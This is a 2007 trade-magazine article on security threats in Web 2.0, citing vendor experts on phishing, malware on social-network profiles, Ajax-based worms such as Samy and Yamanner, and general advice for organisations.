Security in the social web age

Web 2.0 has been heralded as a major shift in the way members of society interact with one other. But with these new forms of collaboration come new and more dangerous threats. IT Weekly takes a look at how safe we really are.

  • E-Mail
By  Administrator Published  March 29, 2007

Every year, Time magazine honours the person who its editorial team feels has made the greatest contribution to the year's events. In 1981, its Person of the Year was the newly-launched personal computer; 15 years later it's given that award to You. Or rather, all of us. For Time, the biggest event of last year was the move towards "the new web" of Wikipedia, YouTube and MySpace; millions of users joining together in "collaboration and community on a scale never seen before" in the "massive social experiment" that is Web 2.0.

With such mainstream recognition, it is safe to say that Web 2.0 has now really arrived, bringing a more interactive and dynamic environment, more rich media content, and more collaboration between web application providers and end-users.

However, while organisations are now looking at ways of incorporating Web 2.0 technology and functionality into their existing web applications, this exciting new world comes with new dangers: the rush to get into the new wave of internet computing is creating a window of opportunity for newer, deadlier security attacks.

Security experts believe that we are already seeing the first signs of this.

Ivor Rankin, senior technical security practice manager for Symantec MENA, says that the firm is now seeing the emergence of a number of unique attack methods and techniques that have been used to exploit everything from social networks, such as MySpace, to Google search queries and other online environments.

Rankin says Symantec is seeing a wide range of attacks against social networking applications, such as instant messaging, with the goal of stealing information. He highlights phishing as a method of attack that continues to grow.

"There have also been attacks against specific services, such as MySpace and Wikipedia. The fact is attacks have occurred and will continue to occur," he says.

Many data and security specialists are predicting this year will see concealed, targeted attacks against specific organisations or individuals emerge as the biggest security concern.

The concern is that the very features that make Web 2.0 a success - better collaborative tools, social computing ability, and faster and broader information distribution - are the same things that will cause the greatest threats to both end-users and organisations.

"The web, in itself, is becoming a far more threatening place to spend time from a point of view of cyber-criminality and identity theft. We have seen a vast increase in the number of compromised computers that are on the internet at any given point in time," says Justin Doo, managing director at Trend Micro MEA.

"These are PCs are being compromised by either receiving spam from malicious issuers and spam that contains malware, like Trojans, backdoors and keyloggers, all by visiting web sites that are hosting downloadable content or content that would automatically download in your PC, without realising that it is happening," Doo adds.

A range of industry reports highlight the dangers of Web 2.0 sites. For instance, security firm ScanSafe says that, on average, up to one in 600 profile pages on social-networking sites host some form of malware.

Given that the number of profiles posted on sites such as MySpace.com or Friendster run into the millions, the numbers of compromised profiles in any of those online communities are likely to be extremely high.

As another example, when Microsoft offered a free PC scanning tool last year, it discovered that of the 5.7 million consumers and small-business owners who used the free service, 62% of the computers scanned had at least one backdoor Trojan in them. About 35% of the bots that were implanted in these PCs came from opening attachments sent via e-mail, instant messages, or peer-to-peer web sites that share data files.

Most of the vulnerabilities in Web 2.0 applications originate from the use of a new programming technique called Ajax (Asynchronous JavaScript and XML). Ajax combines the elements of the JavaScript and XML programming languages to allow web developers to accelerate the interactivity of their web sites.

While Ajax helps make flashier web pages, the downside of using this tool is it can just as easily aggravate security attacks on web sites and end-user PCs. Ajax-based web applications, which are more dynamic in nature and allow web page content to be updated "on the fly" without reloading the entire page, offer widespread opportunities for hackers to exercise their craft.

"The attacks are the same. We are still seeing Trojans, viruses and worms, but it has become a broader spectrum. In some cases, it is making it easier for the hackers because there are more holes, more points of entry into these applications because they are so interactive," says Tareque Choudhury, senior technical consultant with Secure Computing's EMEA division.

Some particular manifestations of these threats include the Yamanner worm that targeted Yahoo Mail, and the Samy and Spaceflash worms, which attacked MySpace profiles.

Admittedly, so far there are only a few high-profile breaches, but nevertheless, it appears that more Ajax worms and other variations are in the offing.

So, what can companies do to protect themselves against this new breed of security attacks?

Given that an organisation's security is only as strong as its weakest link, Trend Micro's Doo stresses the importance of monitoring users' web behaviour.

"If you are encouraging users to interact with web sites that are hosting information for further download, then the content of those web sites itself need to be monitored. We need to try and drive better user web behaviour. We need to encourage people to take fewer risks," he argues. "The problem most of us face is that we see the internet as an impersonal object, and many of us have never been hurt using the internet. Companies should have a more stringent approach when it comes to the traffic that goes in and out of the organisation."

Security in a Web 2.0 world, according to Rankin, should entail a changing of the mindset of companies. Instead of focusing on protecting systems, he says that companies should be able to protect information irrespective of which system they reside on.

"It is critical that we need to adopt, as a strategy, a more holistic security solution that would protect not only the information that sits on a company's database but anywhere within the network, and effectively, anywhere on the internet," notes Rankin. "It is essential that companies should realise that their responsibility no longer ends within their perimeter but rather it now ends where the information sits, and that means potentially every PC of their customers, every PDA that their customers are using, and so on."

Clearly, there is a lot of work to be done to make Web 2.0 safe to use for everybody - that is, if we do not want the answer to the question of "what poses the greatest security threat" to be "You".

Add a Comment

Your display name This field is mandatory

Your e-mail address This field is mandatory (Your e-mail address won't be published)

Security code